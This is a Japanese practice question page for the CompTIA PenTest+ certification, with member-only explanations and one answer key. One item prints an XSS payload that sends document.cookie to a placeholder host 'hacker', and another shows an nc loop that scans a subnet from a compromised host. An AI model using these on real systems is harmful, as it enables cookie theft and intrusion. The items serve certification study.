PT0-002日本語 無料問題集「CompTIA PenTest+ Certification (PT0-002日本語版)」

侵入テストの報告活動中に得られた発見事項について、要約した概要レベルの議論を示すものはどれですか。

解説: (JPNTest メンバーにのみ表示されます)
侵入テスターは、アクティブなシステムを迅速に識別するためにクラス C ネットワークを調査しています。侵入テスターは次のコマンドのどれを使用する必要がありますか?

侵入テスト担当者が侵入テストを実施していたところ、ネットワーク トラフィックがクライアントの IP アドレスに到達していないことがわかりました。テスターは後に、SOC がペネトレーション テスターの IP アドレスでシンクホールを使用していたことを発見しました。次のうち、何が起こったのかを最もよく表しているのはどれですか?

解説: (JPNTest メンバーにのみ表示されます)
次のツールのうち、侵入テスターがワイヤレス ハンドシェイクをキャプチャして Windows マシンから Wi-Fi パスワードを明らかにするのに最も適しているのはどれですか?

解説: (JPNTest メンバーにのみ表示されます)
ペネトレーション テスターは、侵害されたシステム上で次のスクリプトを作成しました。
#!/bin/bash
network='10.100.100'
ports='22 23 80 443'
for x in {1 .. 254};
do (nc -zv $network.$x $ports );
終わり
別のツールの代わりにこのスクリプトを使用することについて説明できるのは次のうちどれですか?

評価者は、できるだけ静かに Nmap スキャンを実行したいと考えています。次のコマンドのうち、検出の可能性が最も低いコマンドはどれですか?

クライアントの建物内の安全な部屋にアクセスするための物理的な侵入テストを実行するために、侵入テスターが雇われました。外部偵察により、2 つの入口、WiFi ゲスト ネットワーク、およびインターネットに接続された複数のセキュリティ カメラが特定されました。
次のツールまたは手法のうち、追加の偵察をサポートするのに最も適しているのはどれですか?

あるソフトウェア会社は、会社のソフトウェア開発プラクティスのセキュリティを評価するために、セキュリティ コンサルタントを雇いました。コンサルタントは、ソフトウェア バイナリでファジングを実行して偵察を開始することを選択します。次の脆弱性のうち、セキュリティ コンサルタントが特定する可能性が最も高いのはどれですか?

解説: (JPNTest メンバーにのみ表示されます)
侵入テスターは、MD5 ハッシュをより迅速に解読したいと考えています。テスターは、パスワードの最初の部分が Winter で、その後に 4 桁の数字と最後に特殊文字が続くことを知っています。テスターは次のコマンドのどれを使用すればよいでしょうか。

侵入テスターは、エンゲージメントで使用するために次のスクリプトを作成しました。
ただし、スクリプトを実行しようとすると、テスターは次のエラーを受け取ります。
エラーの原因は次のどれですか?

解説: (JPNTest メンバーにのみ表示されます)
インターネットに直接接続されている LOT デバイスに関連する最も一般的な脆弱性は次のうちどれですか?

解説: (JPNTest メンバーにのみ表示されます)
侵入テスターがサーバーの脆弱性を悪用し、ペイロードをリモートで実行してシェルを取得しました。ただし、接続は確立されず、ペイロードの実行でエラーは表示されませんでした。侵入テスターは、IPS や次世代ファイアウォールなどのネットワーク デバイスが接続を切断しているのではないかと疑っていました。次のペイロードのうち、シェルを正常に確立する可能性が最も高いのはどれですか?

解説: (JPNTest メンバーにのみ表示されます)
侵入テスト中に CentOS コンピューターが悪用されました。最初の偵察中に、侵入テスターはポート 25 が内部の Sendmail サーバーで開いていることを発見しました。ステルス性を保つために、テスターは攻撃マシンから次のコマンドを実行しました。

次のうち、標的のネットワークにさらに侵入するために使用するのに最適なコマンドはどれですか?

いつ
URL http://192.168.0-1/validate/user.php にアクセスすると、ペネトレーション テスターは次の出力を取得しました。
..d index: eid in /apache/www/validate/user.php line 12
..d index: uid in /apache/www/validate/user.php line 13
..d index: pw in /apache/www/validate/user.php line 14
..d index: acl in /apache/www/validate/user.php line 15

解説: (JPNTest メンバーにのみ表示されます)
次の表があるとします。

Python スクリプトでファイアウォール ルールの既知の適切な構成を保存するために最もよく使用されるデータ構造は次のどれですか。

次のコードがあるとします。
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
この種の攻撃を防ぐための最良の方法は次のうちどれですか? (2つ選んでください。)

正解:A、E 解答を投票する
解説: (JPNTest メンバーにのみ表示されます)
侵入テスト中にクライアントの連絡窓口と通信する潜在的な理由は、テスト コンポーネントがシステムまたはサービスをクラッシュさせ、正規のユーザーとさらなるテストの両方が利用できなくなった場合に解決策を提供することです。この概念を最もよく説明しているのは次のうちどれですか?

解説: (JPNTest メンバーにのみ表示されます)
組織のオフィスの物理的なセキュリティ評価を実行するために、侵入テスターが雇われました。数時間環境を監視した後、ペネトレーション テスターは、一部の従業員が近くのレストランで昼食を取り、食べ物を手に入れている間、持ち物をテーブルに放置していることに気付きました。次の手法のうち、多くのアラートを発生させずに組織の建物への正当なアクセスを取得するために使用される可能性が最も高いのはどれですか?

侵入テスターが、以前は不明だったインターフェイス上の IP 範囲を持つネットワーク デバイスへのアクセスを取得しました。さらなる調査により、これはサードパーティ サプライヤーへの常時接続 VPN トンネルであることが判明しました。
ペネトレーションテスターが取るべき最善のアクションは次のうちどれですか?

弊社を連絡する

我々は12時間以内ですべてのお問い合わせを答えます。

オンラインサポート時間:( UTC+9 ) 9:00-24:00
月曜日から土曜日まで

サポート:現在連絡